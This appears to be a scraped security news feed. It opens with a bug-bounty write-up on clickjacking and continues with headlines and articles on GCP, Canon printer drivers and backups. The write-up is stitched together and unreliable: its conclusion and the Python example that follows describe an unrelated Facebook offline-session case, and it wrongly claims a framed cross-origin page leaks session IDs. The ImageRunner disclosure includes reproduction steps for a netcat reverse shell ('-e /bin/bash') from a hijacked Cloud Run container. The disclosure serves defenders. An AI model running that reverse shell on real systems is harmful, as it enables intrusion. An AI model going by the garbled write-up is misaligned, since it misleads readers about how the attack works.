Unmasking the Hidden Danger: How a Missing Header Led to Session Hijacking (And What It Teaches Us About Web Security)
Introduction: The Silent Threat in Your Browser
Vulnerability Type: Clickjacking via a missing X-FRAME-OPTIONS header
Impact: Attackers could steal session cookies, leading to full account takeover
Significance: This flaw bypassed the app’s otherwise robust defenses, proving that one weak link can break the chain.
Bounty Awarded: $100
Original Writeup: Medium Article

Clickjacking: When Your Screen Lies to You
Clickjacking is akin to a magic trick of the web kind: attackers conceal malicious elements on top of a genuine webpage, fooling victims into clicking something they never meant to. Without the X-FRAME-OPTIONS header, which indicates whether a page can be framed, a malicious site can load the target page in a hidden iframe and hijack clicks.
Impact: The weak endpoint disclosed sensitive session data (usernames, session IDs) in its response. An attacker could frame it and trick a logged-in user into performing actions (like clicking a hidden button) that expose the session. No exploit code at all, just cunning visual deception.

Exploitation Process: The Art of Digital Sleuthing
Step 1: Finding Hidden Vectors
The researcher had put days into brute-forcing directories (i.e., checking each door in a building to discover the unlocked ones). The jackpot? An endpoint (/ping/loggedIn) that returned the session details:
{"username": "arbazkiraak007", "sessionId": "54CA86A999CB2DE0CD87F1EB37289261-n3"}
Step 2: The “Aha!” Moment
Why check this endpoint for clickjacking? Because it leaked session IDs. The researcher’s thought process: “If I can frame this page, I can steal cookies secretly.” A quick check showed the X-FRAME-OPTIONS header was absent, unlike on other endpoints, which refused to be framed.
Step 3: The Copy-Paste Game
No advanced tools needed. He simply constructed a simple HTML page with the vulnerable endpoint embedded in an invisible iframe. When someone lands on the malicious page, their browser quietly requests the target endpoint, and their session ID goes flying.
Creative Twist: The endpoint itself was not interactive; it only leaked data. But by framing it, an attacker could pair it with social engineering (e.g., “Click here for a free gift!”) to lure users into generating the request.
Impact and Mitigation: When a Small Flaw Becomes a Big Problem
Worst-Case Scenario: Account takeover, data breaches, or lateral movement within the app.
Mitigation:
Add the Header: Set X-FRAME-OPTIONS: DENY or SAMEORIGIN on all endpoints.
Content Security Policy (CSP): Use frame-ancestors to whitelist trusted domains.
Audit Relentlessly: Automated scans miss edge cases. Manually review lesser-used endpoints.

Conclusion: Trust, But Verify
Any security system is only as strong as its weakest point, and the Facebook Creator App showed exactly such a weakness. Bypasses arise when developers favor user-friendly features over fundamental security controls. The Facebook Creator App vulnerability carries several vital lessons. A visual logout confirmation deceives users when it does not terminate server-side sessions. Offline features must make users re-authenticate when they reconnect to the network. Every feature needs to be tested under different connection setups, including unstable wireless networks, to find weaknesses. Security professionals need more than code review: they should adopt a zero-trust approach that requires server-side verification before granting session access. Attackers persistently exploit these gaps by targeting offline queue systems, which tend to be weaker than the complex core security systems. Stay skeptical, test offline, and remember: sessions can haunt you. 👻
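The server-side fix that the first case study calls for (a global session kill switch, re-validation of offline-queued actions before they are applied, and forced re-authentication for high-risk actions), as an added Python example that is not part of the HACKLIDO article or of any Facebook code. The session store, action names, risk policy and timestamps are constructed for illustration.

```python
from __future__ import annotations

import secrets
from dataclasses import dataclass

# Constructed policy values for this example; a real deployment tunes these.
HIGH_RISK_ACTIONS = {"delete_post", "send_message", "change_email"}
REAUTH_WINDOW_SECONDS = 300


@dataclass
class Session:
    user: str
    token: str
    last_auth: float       # when the user last proved who they are
    revoked: bool = False  # flipped by "log out of all devices"


class SessionStore:
    """Authoritative, server-side record of which sessions are alive."""
    def __init__(self) -> None:
        self._by_token: dict[str, Session] = {}

    def login(self, user: str, now: float) -> str:
        token = secrets.token_urlsafe(16)
        self._by_token[token] = Session(user, token, last_auth=now)
        return token

    def revoke_all(self, user: str) -> int:
        """Global kill switch: the user's sessions die here, not just in the UI."""
        victims = [s for s in self._by_token.values() if s.user == user and not s.revoked]
        for session in victims:
            session.revoked = True
        return len(victims)

    def validate(self, token: str) -> Session | None:
        session = self._by_token.get(token)
        return None if session is None or session.revoked else session


@dataclass
class QueuedAction:
    token: str
    kind: str
    payload: str
    cached_session_ok: bool = True  # what the client believed while offline


def sync_queue_vulnerable(queue: list[QueuedAction]) -> list[tuple[str, str]]:
    """The case-study bug: the server trusts the client's cached session state."""
    return [(a.kind, a.payload) for a in queue if a.cached_session_ok]


def sync_queue_hardened(store: SessionStore, queue: list[QueuedAction], now: float):
    """Re-validate every queued action against the store before applying it."""
    applied: list[tuple[str, str]] = []
    rejected: list[tuple[str, str]] = []
    for action in queue:
        session = store.validate(action.token)
        if session is None:
            rejected.append((action.kind, "session revoked or unknown"))
            continue
        stale = now - session.last_auth > REAUTH_WINDOW_SECONDS
        if action.kind in HIGH_RISK_ACTIONS and stale:
            rejected.append((action.kind, "reauthentication required"))
            continue
        applied.append((action.kind, action.payload))
    return applied, rejected


def replay_case_study() -> dict:
    """Device A logs out everywhere while device B sits offline with queued work."""
    store = SessionStore()
    token_a = store.login("creator", now=1000.0)
    token_b = store.login("creator", now=1000.0)
    # Device B queues work while offline; its cached state still says "logged in".
    queue = [
        QueuedAction(token_b, "publish_post", "hello from airplane mode"),
        QueuedAction(token_b, "delete_post", "post-42"),
    ]
    store.revoke_all("creator")  # "log out of all devices" pressed on device A
    assert store.validate(token_a) is None and store.validate(token_b) is None
    vulnerable = sync_queue_vulnerable(queue)  # the revoked device's post still lands
    applied, rejected = sync_queue_hardened(store, queue, now=1020.0)
    # A live but stale session may still post, yet must re-authenticate for high risk.
    token_c = store.login("creator", now=1020.0)
    stale_queue = [
        QueuedAction(token_c, "publish_post", "fresh session"),
        QueuedAction(token_c, "delete_post", "post-43"),
    ]
    stale_applied, stale_rejected = sync_queue_hardened(store, stale_queue, now=1500.0)
    return {
        "vulnerable_applied": vulnerable,
        "hardened_applied": applied,
        "hardened_rejected": rejected,
        "stale_applied": stale_applied,
        "stale_rejected": stale_rejected,
    }
```

The vulnerable sync applies both queued actions from the revoked device; the hardened sync rejects them, and separately refuses the high-risk deletion from a session that has not re-authenticated within the window.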
by HACKLIDO
2025-04-01 16:06:40
GitHub found 39M secret leaks in 2024. Here’s what we’re doing to help
Every minute, GitHub blocks several secrets with push protection—but secret leaks still remain one of the most common causes of security incidents. Learn how GitHub is making it easier to protect yourself from exposed secrets, including today’s launches of standalone Secret Protection, org-wide scanning, and better access for teams of all sizes. The post GitHub found 39M secret leaks in 2024. Here’s what we’re doing to help appeared first on The GitHub Blog.
by The GitHub Blog
2025-04-01 14:55:07
North Korean IT worker army expands operations in Europe
North Korea's IT workers have expanded operations beyond the United States and are now increasingly targeting organizations across Europe. [...]
by BleepingComputer
2025-04-01 14:37:53
Google Rolls Out Simplified End-to-End Encrypted Email in Gmail
Google has announced a significant upgrade to Gmail for enterprise, now giving the ability to send end-to-end encrypted (E2EE) emails to any inbox with minimal setup. Starting today, Gmail users in participating organizations can begin sending E2EE messages within their own domains, with support for all Gmail users rolling out in the coming weeks — … The post Google Rolls Out Simplified End-to-End Encrypted Email in Gmail appeared first on CyberInsider.
by Cyber Insider
2025-04-01 14:14:11
Chrome to Fix Decades-Old Browsing History Privacy Leak Problem
Web browsers have long exposed users to a subtle but powerful privacy risk: the ability for malicious sites to detect which links a user has previously visited. In 2025, that issue may finally be resolved. A new proposal — now implemented in experimental builds of Chrome — introduces partitioned visited link history, a significant change … The post Chrome to Fix Decades-Old Browsing History Privacy Leak Problem appeared first on CyberInsider.
by Cyber Insider
2025-04-01 14:09:54
CrushFTP CVE-2025-2825 flaw actively exploited in the wild
Attackers exploit the CrushFTP CVE-2025-2825 flaw, enabling unauthenticated access to unpatched devices using public proof-of-concept code. Threat actors are exploiting a critical authentication bypass vulnerability, tracked as CVE-2025-2825, in the CrushFTP file transfer software. Attackers are using exploits based on publicly available proof-of-concept exploit code. The vulnerability impacts CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0, it […]
by Security Affairs
2025-04-01 14:00:00
“You get Instant Purge, and you get Instant Purge!” — all purge methods now available to all customers
Following up on having the fastest purge in the industry, we have now increased Instant Purge quotas across all Cloudflare plans.
by Cloudflare
2025-04-01 14:00:00
FDA's Critical Role in Keeping Medical Devices Secure
The FDA's regulations and guidance aim to strike a balance between ensuring rigorous oversight and enabling manufacturers to act swiftly when vulnerabilities are discovered.
by Dark Reading
2025-04-01 14:00:00
Google 'ImageRunner' Bug Enabled Privilege Escalation
Tenable released details of a Google Cloud Run flaw that prior to remediation allowed a threat actor to escalate privileges.
by Dark Reading
2025-04-01 13:21:21
Lazarus APT Jumps on ClickFix Bandwagon in Recent Attacks
A continuation of the North Korean nation-state threat's campaign against employment seekers uses the social engineering attack to target CeFi organizations with the GolangGhost backdoor.
by Dark Reading
2025-04-01 13:00:14
Google says easy email encryption is on the way - for some users
Sending encrypted emails today involves a nightmare of certificates and administrative headaches. Google says it's ready to make things easier.
by ZDNET Security
2025-04-01 13:00:00
CyberheistNews Vol 15 #13 Why Password Security Matters: The Danish and Swedish Password Problem
by KnowBe4
2025-04-01 12:24:00
Sam’s Club investigating attack claim linked to Clop ransomware
The prolific gang is linked to the exploitation of critical flaws in Cleo file transfer software.
by Cybersecurity Dive
2025-04-01 12:12:00
Critical vulnerability in CrushFTP file transfer software under attack
Questions and confusion surround the authentication bypass vulnerability, which was privately disclosed to customers on March 21.
by Cybersecurity Dive
2025-04-01 12:00:14
How to talk to your family and friends about online security - before it's too late
Your friends and family members are just waiting to be exploited by online attackers. They need your help.
by ZDNET Security
2025-04-01 11:30:59
France’s antitrust authority fines Apple €150M for issues related to its App Tracking Transparency
France fines Apple €150M for abusing its dominance in ATT consent practices on iOS and iPadOS from 2021 to 2023. France’s Autorité de la concurrence fined Apple €150M for abusing its dominance in App Tracking Transparency (ATT) consent practices on iOS and iPadOS between April 26, 2021 and July 25, 2023. Apple launched ATT with […]
by Security Affairs
2025-04-01 11:17:00
Apple Fined €150 Million by French Regulator Over Discriminatory ATT Consent Practices
Apple has been hit with a fine of €150 million ($162 million) by France's competition watchdog over the implementation of its App Tracking Transparency (ATT) privacy framework. The Autorité de la concurrence said it's imposing a financial penalty against Apple for abusing its dominant position as a distributor of mobile applications for iOS and iPadOS devices between April 26, 2021 and July 25,
by The Hacker News
2025-04-01 11:13:20
Intimate images from kink and LGBTQ+ dating apps left exposed online
A number of specialized dating apps leaked the (not so) secret storage location of 1.5 million more or less explicit images.
by Malwarebytes Labs
2025-04-01 11:00:00
AWS or Azure? My Team Can’t Decide
Learn how to mediate a team’s cloud debate by evaluating business needs, exploring multi-cloud options, and applying structured decision-making.
by ITPro Today
2025-04-01 11:00:00
Why multi-factor authentication is absolutely essential in 2025
Want to avoid having your online accounts hacked? Two-factor authentication is a crucial security measure that requires an extra step for signing in to high-value services. Here's how to set up 2FA and which accounts to focus on.
by ZDNET Security
2025-04-01 10:45:00
Gmail ‘bubble’ encryption may be an S/MIME killer, says Google
Marking the 21st anniversary of Gmail, Google is preparing to roll out an end-to-end encryption standard for its email service in hopes of democratising encryption and leaving old standards in the dust.
by ComputerWeekly
2025-04-01 10:30:52
Qilin affiliates spear-phish MSP ScreenConnect admin, targeting customers downstream
Attack matches three-year-long pattern of ScreenConnect attacks tracked by Sophos MDR as STAC4365.
by Sophos News
2025-04-01 10:29:38
AI, Data Protection, and Governance: Key Pillars for the Future of Business
The Microsoft Fabric Community Conference, currently underway from March 31 to April 2, 2025, in Las Vegas, has already become a major event for data professionals and AI enthusiasts alike. With over 200 sessions, 13 specialized tracks, and numerous hands-on workshops, the conference is attracting industry experts and users who are eager to explore the evolving landscape of data security and AI governance. The annual event is a platform for sharing insights, with a focus on key topics such as data security, governance, and the rapid advancements in artificial intelligence (AI) technologies. As AI continues to revolutionize various industries, organizations are also facing growing challenges surrounding data protection, governance, and regulatory compliance.

AI’s Role in Data Security and Governance
AI has become deeply integrated into the daily work of many professionals. A significant 75% of knowledge workers now use some form of AI in their daily tasks, contributing to its widespread adoption. However, this widespread use of AI comes with its own set of challenges. Governments around the world are moving quickly to address the potential risks and ethical concerns associated with AI. Over 69 countries have proposed over 1,000 AI-related policy initiatives, and businesses must navigate an increasingly complex regulatory environment to ensure compliance. As companies continue to adopt AI technologies, they are also seeking comprehensive solutions to address data security, governance, and privacy issues. These solutions are essential not only for compliance with emerging regulations but also for mitigating the risks of data leaks, oversharing, and unauthorized access to sensitive information.

The Growing Need for Security and Governance Solutions
At the conference, Microsoft unveiled several new innovations designed to help organizations tackle these challenges as they embrace AI and new data management practices. Among the key announcements:

Enhancing Data Loss Prevention for Lakehouse in Microsoft Fabric
Microsoft Purview’s Data Loss Prevention (DLP) capabilities, which are already integrated with Microsoft 365, are now expanding to better protect sensitive data in lakehouse environments within Microsoft Fabric. These enhancements aim to help prevent data loss by restricting access based on data sensitivity. Data security administrators can configure policies to ensure that only internal users or authorized data owners have access to sensitive information. This functionality is especially crucial when working with guest users in Fabric, as it ensures that proprietary data remains secure.

Expanding DLP Support for More Fabric Items
In a bid to offer more comprehensive data protection, Microsoft is expanding DLP policy support for additional Fabric items, including KQL (Kusto Query Language) and Mirrored databases. These databases are essential for real-time analytics and contain large amounts of sensitive data. The extension of Purview DLP support to these sources helps users receive notifications when they interact with sensitive data, thus minimizing the risk of accidental data leakage. The expansion also includes databases like Azure Cosmos DB, Azure SQL, and Snowflake, which are part of a broader strategy to safeguard data across diverse environments.

Integration with Copilot for Power BI
AI has raised new concerns about data security, particularly when it comes to the use of tools like Copilot. Microsoft is now integrating Microsoft Purview with Copilot for Power BI, which aims to provide users with greater visibility into potential data risks associated with AI-driven prompts and responses. Through the Microsoft Purview Data Security Posture Management (DSPM) dashboard, users will receive alerts and recommended actions to mitigate risks related to sensitive data. This integration also supports monitoring AI usage, helping organizations identify potential risks of non-compliant AI practices, such as unauthorized sharing of sensitive data or misuse by departing employees.

Introducing Data Observability in Microsoft Purview Unified Catalog
One of the most anticipated announcements is the introduction of data observability within the Microsoft Purview Unified Catalog, now available in preview. This feature allows organizations to visually investigate data quality issues and trace their root causes through an interactive interface. Users can track the relationships between governance domains, data products, and data assets across multicloud and hybrid environments. This tool is designed to improve data quality, a critical aspect of ensuring AI systems operate effectively and comply with regulatory reporting requirements.

A Unified Approach to Data Security and AI Governance
As organizations continue to integrate AI into their operations, the importance of safeguarding data and ensuring compliance with evolving regulations will only increase. Microsoft’s announcements at the conference aim to help companies address these challenges by providing comprehensive, integrated tools that offer greater control over data management and security. The intersection of AI, data security, and governance is becoming increasingly complex, and it is clear that organizations must adopt more advanced and integrated solutions to navigate this evolving landscape. The ability to seamlessly manage data across multiple platforms, enforce policies around data usage, and ensure compliance with global regulatory standards will be key to safely unlocking the full potential of AI technologies.
by The Cyber Express
2025-04-01 10:02:30
Security Firm APIsec Exposed 3TB of Sensitive Customer Data
A misconfigured Elasticsearch database belonging to APIsec.ai, a security firm claiming to serve 80% of the Fortune 100, was discovered leaking over three terabytes of highly sensitive customer data — including API scan results, configuration secrets, and personally identifiable information (PII). The discovery was made by UpGuard’s Greg Pollock during routine scanning for exposed cloud … The post Security Firm APIsec Exposed 3TB of Sensitive Customer Data appeared first on CyberInsider.
by Cyber Insider
2025-04-01 10:00:17
Evolution of Sophisticated Phishing Tactics: The QR Code Phenomenon
Phishing with QR codes: New tactics described here include concealing links with redirects and using Cloudflare Turnstile to evade security crawlers. The post Evolution of Sophisticated Phishing Tactics: The QR Code Phenomenon appeared first on Unit 42.
by Palo Alto Networks - Unit42
2025-04-01 10:00:14
Why delaying software updates is a terrible idea
One missed update turned my website into a hacker's playground and another locked me out of my own business tools. Here's why skipping software updates isn't worth the risk.
by ZDNET Security
2025-04-01 10:00:00
ImageRunner: A Privilege Escalation Vulnerability Impacting GCP Cloud Run
Tenable Research discovered a privilege escalation vulnerability in Google Cloud Platform (GCP) that is now fixed and which we dubbed ImageRunner. At issue are identities that lack registry permissions but that have edit permissions on Google Cloud Run revisions. The vulnerability could have allowed such an identity to abuse its Google Cloud Run revision edit permissions in order to pull private Google Artifact Registry and Google Container Registry images in the same account.
What are Cloud Run, Container Registry and Artifact Registry?
Cloud Run, Container Registry, and Artifact Registry are key components of Google's Cloud ecosystem for deploying and managing containerized applications. Cloud Run is a fully managed service for running containerized applications in a scalable, serverless environment. Container Registry, an older service, was deprecated in favor of Artifact Registry as of March 18, 2025. While both services are designed to store and manage container images, Artifact Registry is the next-generation solution with broader functionality and support for multiple artifact types beyond container images, such as Maven and npm packages. When Cloud Run is being used, it retrieves a container image stored in Artifact Registry and uses it to deploy your application. It manages the infrastructure, scaling and execution environment, allowing you to run your application in a serverless manner without having to worry about the underlying systems.
ImageRunner vulnerability details
When deploying a Cloud Run service, a new revision is created. A Cloud Run revision represents a specific version of a user’s deployed service in Google Cloud Run. Each time you deploy or update a service (such as changing the code or configuration), a new revision is created. When users deploy their Cloud Run revision, they can choose the image to deploy from a Container Registry, an Artifact Registry or Docker Hub by specifying the container image URL. Cloud Run needs IAM permissions to pull container images from the container or artifact registries, and it uses a service agent to do so. A service agent is a special type of service account created and managed by Google Cloud. It acts as the “worker” that handles essential operations, such as, in Cloud Run, pulling container images from registries like Google Container Registry or Artifact Registry to deploy the user’s application.
Abusing the deployment process
If an attacker gains certain permissions within a victim’s project – specifically run.services.update and iam.serviceAccounts.actAs permissions – they could modify a Cloud Run service and deploy a new revision. In doing so, they could specify any private container image within the same project for the service to pull. This is where it gets messy: attackers could access sensitive or proprietary images stored in a victim’s registries, bypassing the two permissions normally required to pull private images from the registry: Storage Object Viewer or Artifact Registry Reader. An attacker can do so by leveraging the ability to add instructions during the service update – more specifically, by adding malicious instructions. These instructions can be injected as arguments or commands in the service configuration. When the updated container runs, the malicious code executes, potentially compromising the container image. For example, the attacker could use their code to inspect the contents of the private image, extract secrets stored within it, or even exfiltrate sensitive data.
The following is an example of an ncat image pull. Netcat (often abbreviated as ncat) is a powerful command-line networking tool used for creating TCP/UDP connections, transferring data, port scanning, and acting as a basic server or client for debugging. To illustrate an attacker using malicious instructions to take over an image, we used this image as a convenient example of a “private image” that is present in the victim’s Container Registry. In the following example, the attacker can add malicious instructions in the form of a reverse connection to their machine, to take over the image and inspect its contents, secrets, and more. Nonetheless, any private image can be attacked by injecting malicious instructions and tailoring a payload to the benefit of the attacker.
This vulnerability arises because the service agent responsible for pulling the images executes these tasks. The service agent associated with Cloud Functions (identified by an account like service-PROJECT_NUMBER@gcf-admin-robot.iam.gserviceaccount.com) will dutifully pull the image specified in the updated service configuration. The Cloud Function’s service agent holds the required storage and Artifact Registry permissions. While this behavior is necessary for Cloud Run to function, it can be abused if permissions are not tightly controlled. For security reasons, we did not test and confirm it, but since the service agent of Cloud Functions is internal, we assume it might have permissions to internal Google images as well.
An important note to clarify: as you would expect, the only permissions a user needs to be able to deploy a Cloud Run revision are run.services.update and iam.serviceAccounts.actAs, but the private image-pulling that GCP needs for the Cloud Run orchestration process should require additional privileges.
Full attack reproduction
For the sake of the example, an attacker would attack a “ncat” image and inject malicious instructions into it. As an example, run the following commands to pull an ncat image and push it to your Google Cloud Registry, which will act as the victim’s repository. The ncat image will act as the victim's private image:
    docker pull raesene/ncat
    gcloud auth login
    gcloud auth configure-docker
    docker tag raesene/ncat gcr.io/{project-name}/ncat:latest
    docker push gcr.io/{project-name}/ncat:latest
1. Control an identity with the following permissions: run.services.update and iam.serviceAccounts.actAs
2. Update a running Cloud Run service, and edit a new revision
3. Specify any private container you want to hijack in the same project - for the proof-of-concept we used gcr.io/{project-name}/ncat:latest
4. Use “nc -lnvp {port}” to listen on the attacker’s machine you want to get the reverse shell to
5. Specify the following in the container arguments fields: {Your nc listener ip address}, {the port you listen on}, -e, /bin/bash
6. You should be running on the container that was deployed with the private image that you shouldn’t be able to access
The vulnerability fix and extra steps taken by Google to enhance overall GCP security
In response to this discovery, GCP now makes sure that the principal (user or service account) creating or updating a Cloud Run resource needs explicit permission to access the container image(s). When using Artifact Registry, you should ensure the principal has the Artifact Registry Reader (roles/artifactregistry.reader) IAM role on the project or repository containing the container image(s) to deploy. The breaking change was 100% rolled out to production on January 28, 2025. Google sent a Mandatory Service Announcement to affected Project, Folder, and Organization owners during the last week of November 2024, while the Release Notes warned users of the breaking change. After this fix, Cloud Run checks to confirm that the deployer has read access to the image.
ImageRunner as an example of the Jenga® concept
ImageRunner is an example of a concept we at Tenable Research call “Jenga®”, just like the game. As part of Tenable Research efforts to discover vulnerability patterns in the cloud, we unveiled this new concept at the recent BlackHat USA 2024 conference. The “Jenga®” concept is present in the major cloud providers. Here’s the gist: cloud providers build their services on top of their other existing services. Sometimes they create “hidden services.” If one service gets attacked or is compromised, the other ones built on top of it inherit the risk and become vulnerable as well. This scenario opens the door for attackers to discover novel privilege escalation opportunities and even vulnerabilities, and introduces new hidden risks for defenders.
For more information about the Jenga® concept and a new tool called Jenganizer that we released to mitigate its risk, read our blogs on the Google CloudImposer vulnerability and Google ConfusedFunction vulnerability. These blogs also discuss the issue of hidden cloud services. Stay tuned for our BlackHat talk recording about CloudImposer. Learn more about how Tenable can help you improve your GCP security. (Jenga® is a registered trademark owned by Pokonobe Associates.)
by Tenable
2025-04-01 09:58:25
Mysterious Disappearance of Cybersecurity Expert Xiaofeng Wang and Wife Triggers FBI Raids
Xiaofeng Wang, a well-respected computer scientist and professor at Indiana University, has suddenly vanished along with his wife, Nianli Ma. The couple’s disappearance has raised a multitude of questions after their profiles were removed from the university's website and their homes were raided by the FBI. Wang, a prominent figure in the field of cryptography, privacy, and cybersecurity, had a distinguished career spanning over two decades. As a professor at Indiana University’s Luddy School of Informatics, Computing, and Engineering, he held academic and research roles, including serving as associate dean for research.
The Enigmatic Disappearance of Xiaofeng Wang
Wang's work, particularly in the protection of human genomic data and systems security, earned him international recognition, and he had coauthored numerous influential papers. His academic journey included contributions to projects funded by nearly $23 million, solidifying his reputation as a leading computer scientist. However, recent developments have cast a shadow over his career and raised serious concerns. In the last few weeks, Wang’s profile page, email account, and phone number were quietly erased from the university’s website without explanation. Similar actions were taken regarding his wife, Nianli Ma, who was a lead systems analyst at the university’s Library Technologies division. The unusual circumstances surrounding their disappearance and the removal of their digital profiles led to widespread speculation among colleagues, students, and the public, reported WIRED. The situation took a dramatic turn when FBI agents raided both of the couple’s homes in Bloomington and Carmel, Indiana. According to local news reports, several unmarked vehicles arrived at their Bloomington residence on a Friday, with agents spending hours moving boxes in and out of the property. A second raid occurred at their Carmel home, where agents conducted a search that reportedly included questioning a woman outside the property and accessing the attic. Witnesses reported seeing investigators taking photos, collecting evidence, and removing several boxes from the residence. Despite the heavy law enforcement presence, the FBI has offered little information about the raids. In a brief statement, an FBI spokeswoman confirmed that "court-authorized law enforcement activity" was conducted at both locations but declined to provide further details. No documents relating to Wang, Ma, or the searches were found in federal court dockets, leading to questions about the nature of the investigation.
The Disappearance Reaches Social Media
The situation has baffled many in the academic and cybersecurity communities. Matthew Green, a professor of cryptography at Johns Hopkins University, expressed his concern on social media, stating, "None of this is in any way normal." He noted that Wang had been missing for weeks and that his students had been unable to contact him. Fellow academic Matt Blaze, a professor at Georgetown University, also voiced his bewilderment, questioning the sudden removal of Wang’s tenure status and the university’s actions to erase his presence from its records. Local news outlet WTHR provided more details about the FBI raid in Carmel, where agents reportedly announced their presence using a megaphone, stating, "FBI, come out!" A woman, believed to be Ma, was seen leaving the house holding a phone, and agents subsequently questioned her before searching the property. The investigation continued for hours, with law enforcement leaving the scene with multiple boxes of evidence. A lawyer representing the family later stated that the purpose of the investigation remained unclear. The disappearance of Xiaofeng Wang and his wife, combined with the FBI’s involvement, has left many puzzled and concerned. Questions about their whereabouts, the nature of the investigation, and the reasons behind their sudden removal from the academic institution remain unanswered. As the FBI investigation unfolds, the academic and cybersecurity communities are closely monitoring the case, hoping for clarity and answers in what has become an increasingly mysterious and troubling situation.
by The Cyber Express
2025-04-01 09:49:08
Apple Backports Zero-Day Fixes to Older iOS and macOS Versions
Apple has issued a wide set of security updates, patching multiple zero-day vulnerabilities across its operating systems — including iOS, macOS, iPadOS, and Safari — and notably extended critical fixes to older software versions, addressing previously exploited flaws. The updates remediate a series of high-risk issues that could allow attackers to execute arbitrary code, access … The post Apple Backports Zero-Day Fixes to Older iOS and macOS Versions appeared first on CyberInsider.
by Cyber Insider
2025-04-01 09:10:14
Why no small business is too small for hackers - and 8 security best practices for SMBs
Don't fall victim to the 'small target illusion.' Learn how cybercriminals exploit SMBs so you can fix your security gaps before it's too late.
by ZDNET Security
2025-04-01 09:01:28
31st March – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 31st March, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES New York University (NYU) suffered a cyber-attack which resulted in the exposure of over 3 million applicants’ data, including names, test scores, majors, and zip codes. The hacker redirected NYU’s website […] The post 31st March – Threat Intelligence Report appeared first on Check Point Research.
by Check Point Research
2025-04-01 09:00:00
I clicked on four sneaky online scams on purpose - to show you how they work
What happens when you get fooled by an online scam that lands in your email or text messages? I'll show you. Caution: Don't try this at home.
by ZDNET Security
2025-04-01 08:55:19
Trojan.Arcanum — a new trojan targeting tarot experts, esotericists, and magicians | Kaspersky official blog
Kaspersky experts have discovered a new Trojan using an original virus detection technology.
by Kaspersky
2025-04-01 08:23:32
Canon CVE-2025-1268 Vulnerability: A Buffer Overflow Threatening Printer Security
Canon Marketing Japan Inc. and Canon Inc. have issued an important security update regarding a vulnerability in certain printer drivers. This Canon vulnerability, identified as CVE-2025-1268, affects a range of Canon printer models, including production printers, office multifunction devices, and small office multifunction devices. The flaw was discovered in Canon printer drivers, specifically the Generic Plus series, which includes several common drivers used by both home and office users.
Overview of the Canon Vulnerability (CVE-2025-1268)
The issue stems from a buffer overflow in Canon printer drivers when a print job is processed by a specially crafted application. Under certain conditions, this flaw could allow unauthorized code to be executed on the affected systems. However, the likelihood of this exploit is considered to be extremely low, and Canon has emphasized that there have been no confirmed cases of this vulnerability being actively exploited. This flaw is a classic example of an out-of-bounds vulnerability, which can lead to unintended behavior in software. In this case, it could prevent printing or potentially allow attackers to execute arbitrary code on the system.
Affected Printer Drivers
The vulnerability affects the following printer drivers:
- Generic Plus PCL6 Printer Driver – Version 3.12 and earlier
- Generic Plus UFR II Printer Driver – Version 3.12 and earlier
- Generic Plus LIPS4 Printer Driver – Version 3.12 and earlier
- Generic Plus LIPSLX Printer Driver – Version 3.12 and earlier
- Generic Plus PS Printer Driver – Version 3.12 and earlier
These printer drivers are commonly used in a wide variety of Canon printer models, including production printers, office multifunction printers, small office multifunction printers, and laser printers.
The Security Impact of CVE-2025-1268
The vulnerability is particularly concerning because it has the potential to be exploited by malicious actors through a crafted application that interacts with these vulnerable Canon printer drivers. According to the CVSS (Common Vulnerability Scoring System), the severity of this issue is rated at 9.4 (on a scale of 0 to 10), which places it in the critical category. The CVSS 3.1 score for this vulnerability is as follows:
Base Score: 9.4
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
This score indicates a high impact on confidentiality and integrity, with no privileges and no user interaction required (PR:N and UI:N in the vector), making it a relatively easy vulnerability for attackers to exploit if the proper conditions are met.
Canon’s Response and Recommendations
While there have been no known instances of this vulnerability being actively exploited, Canon strongly advises users to take action to mitigate potential risks. The company has recommended updating the affected printer drivers to the latest versions available. These updates, which contain fixes for the Canon printer vulnerability, can be downloaded from the official Canon websites or through local Canon sales representatives.
Conclusion
The discovery of this vulnerability by Robert Ord in collaboration with the Microsoft Offensive Research and Security Engineering (MORSE) Team highlights the critical role of security researchers in identifying and addressing potential risks in connected devices like printers. While the immediate threat may be low, the potential for damage highlights the importance of regularly updating Canon printer drivers to maintain network security.
by The Cyber Express
2025-04-01 08:09:12
World Backup Day: Why Human Error Remains the Biggest Threat to Data Protection
World Backup Day, observed annually on March 31, serves as a reminder of the importance of protecting data against cyber threats, accidental deletions, and technical failures. Despite growing awareness, many firms still overlook a major vulnerability that can render even the most complex backup strategies ineffective: human error. Employees—often unknowingly—pose risks to backup integrity through mistakes such as accidental deletions, misconfigured backup settings, and falling victim to social engineering attacks. One of the latest surveys highlights concerning trends: 55% of users rely on cloud storage as their primary backup method, yet only 33% back up their data regularly. Furthermore, 34% of respondents cited accidental deletion and lack of backup as the leading causes of data loss. These statistics show us the reality—without strong backup practices and employee awareness, businesses remain vulnerable to data breaches, ransomware attacks, and irreversible data loss.
As Amit Luthra, Managing Director of Lenovo ISG India, aptly puts it: “In an era where AI adoption accelerates and IT infrastructures grow increasingly complex, ensuring seamless data availability and resilience has become paramount. Cyber threats, system failures, and stringent compliance mandates necessitate robust backup and disaster recovery strategies—not merely as safeguards, but as business imperatives. Lenovo's ThinkSystem and ThinkAgile solutions are meticulously engineered to meet these evolving demands. They provide secure, scalable, and AI-ready infrastructure that ensures continuous data protection.” This highlights a point: backup strategies must evolve alongside technological advancements. Simply having a backup is no longer enough—it must be resilient, automated, and cyber-aware to mitigate both technical and human-induced risks. This article explores the most common human errors in backup management, the risks of data loss, and effective strategies organizations can implement to safeguard their backup systems from internal mistakes and cyber threats.
Common Human Errors in Backup Management
Even the most advanced backup systems can fail due to simple human mistakes. Here are some of the most common errors employees make:
Accidental Deletion of Critical Files: Employees may unintentionally delete essential files or entire folders, assuming they are no longer needed. If backups are not frequent or properly structured, restoring deleted data becomes impossible.
Overwriting Backup Data: When employees manually back up files, they sometimes overwrite crucial previous versions, eliminating the ability to recover older data in case of errors.
Failure to Follow Backup Protocols: Organizations implement backup policies, but employees may neglect to follow them. This includes failing to run scheduled backups or disconnecting backup drives before completion.
Mishandling Physical Backup Devices: External hard drives, USBs, and SD cards are prone to damage or loss. An unintentional drop or misplacement can result in irrecoverable data loss.
Ignoring Security Measures: Employees often reuse weak passwords, misconfigure backup settings, or unknowingly expose backups to cyber threats.
These mistakes highlight the need for a comprehensive backup strategy and employee training to prevent data loss.
The Main Data Risks and the Role of Backup in Mitigation
Data loss occurs due to various factors, with ransomware attacks leading the charge. Here’s an overview of the most significant threats and how backups mitigate them:
